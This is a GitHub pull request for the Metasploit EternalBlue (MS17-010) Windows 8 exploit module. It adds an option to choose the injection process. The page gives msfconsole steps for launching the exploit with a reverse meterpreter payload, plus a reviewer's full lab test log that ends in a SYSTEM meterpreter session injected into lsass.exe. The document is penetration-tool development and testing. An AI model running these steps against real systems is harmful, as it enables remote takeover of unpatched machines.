New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add support for ms17_010_eternalblue_win8 ProcessName option #10794

Merged
merged 1 commit into from Nov 5, 2018

Conversation

Projects
None yet
3 participants
@l9c
Copy link
Contributor

l9c commented Oct 11, 2018

The shellcode was hardcoded to process "lsass.exe" or "spoolsv.exe". This change adds support for ProcessName option by using runtime hash (similar to #10792 ).
Please verify this module cause I don't have test machine for it.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue_win8
  • set processname explorer.exe
  • set rhost <victim-address>
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <listener-address>
  • run
  • ps to find the PID of explorer.exe
  • getpid to check the PID

@bwatters-r7 bwatters-r7 self-assigned this Nov 5, 2018

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 5, 2018

Testing on Windows 8.1x64 Pro:

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue_win8):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   GroomAllocations  13               yes       Initial number of times to groom the kernel pool.
   ProcessName       spoolsv.exe      no        Process to inject payload into.
   RHOST             192.168.134.136  yes       Target server
   RPORT             445              yes       Target server port
   SMBPass           [redacted]       no        (Optional) The password for the specified username
   SMBUser           msfuser          no        (Optional) The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The local listener hostname
   LPORT     45354            yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   win x64


msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set processname lsass.exe
processname => lsass.exe
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started HTTPS reverse handler on https://192.168.135.111:45354
[*] shellcode size: 1491
[*] numGroomConn: 13
[*] Target OS: Windows 8.1 Pro 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] https://192.168.135.111:45354 handling request from 192.168.134.136; (UUID: st6p1li8) Staging x64 payload (207449 bytes) ...

meterpreter > sysinfo
Computer        : WIN81X64
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getpid
Current pid: 528
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]                                                     
 4     0     System                  x64   0                                      
 272   4     smss.exe                x64   0                                      
 364   348   csrss.exe               x64   0                                      
 428   348   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 436   420   csrss.exe               x64   1                                      
 480   420   winlogon.exe            x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 520   428   services.exe            x64   0                                      
 528   428   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 592   520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 636   520   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 728   480   dwm.exe                 x64   1        Window Manager\DWM-1          C:\Windows\system32\dwm.exe
 748   520   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 760   520   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 800   520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 832   520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 876   520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 920   520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 980   520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1016  520   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1140  800   audiodg.exe             x64   0                                      
 1180  2080  cmd.exe                 x64   1        WIN81X64\msfuser              C:\Windows\system32\cmd.exe
 1260  520   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1320  520   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1356  520   MsMpEng.exe             x64   0                                      
 1376  520   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1580  520   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1868  592   TiWorker.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.16384_none_fa1dc1539b4180d8\TiWorker.exe
 1912  520   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1968  832   taskhostex.exe          x64   1        WIN81X64\msfuser              C:\Windows\system32\taskhostex.exe
 2032  592   WmiPrvSE.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\wbem\wmiprvse.exe
 2080  2064  explorer.exe            x64   1        WIN81X64\msfuser              C:\Windows\Explorer.EXE
 2100  520   VSSVC.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\vssvc.exe
 2284  2448  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 2304  520   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 2372  520   TrustedInstaller.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2448  520   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 2672  592   WmiPrvSE.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\wmiprvse.exe
 2808  2080  vmtoolsd.exe            x64   1        WIN81X64\msfuser              C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2864  2836  jusched.exe             x86   1        WIN81X64\msfuser              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
 2980  2448  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe
 3016  832   taskhost.exe            x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\taskhost.exe
 3052  592   WSHost.exe              x64   1        WIN81X64\msfuser              C:\Windows\WinStore\WSHost.exe
 3364  520   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\dllhost.exe
 3380  832   taskhost.exe            x64   1        WIN81X64\msfuser              C:\Windows\system32\taskhost.exe
 3564  1180  conhost.exe             x64   1        WIN81X64\msfuser              C:\Windows\system32\conhost.exe
 3656  520   msiexec.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\msiexec.exe
 3784  520   svchost.exe             x64   0                                      

meterpreter >

@bwatters-r7 bwatters-r7 merged commit ed2ba1c into rapid7:master Nov 5, 2018

2 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Nov 5, 2018

Release notes

This PR allows users to specify into which process they would like to payload injected when using the ms17_010_eternalblue_win8 module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment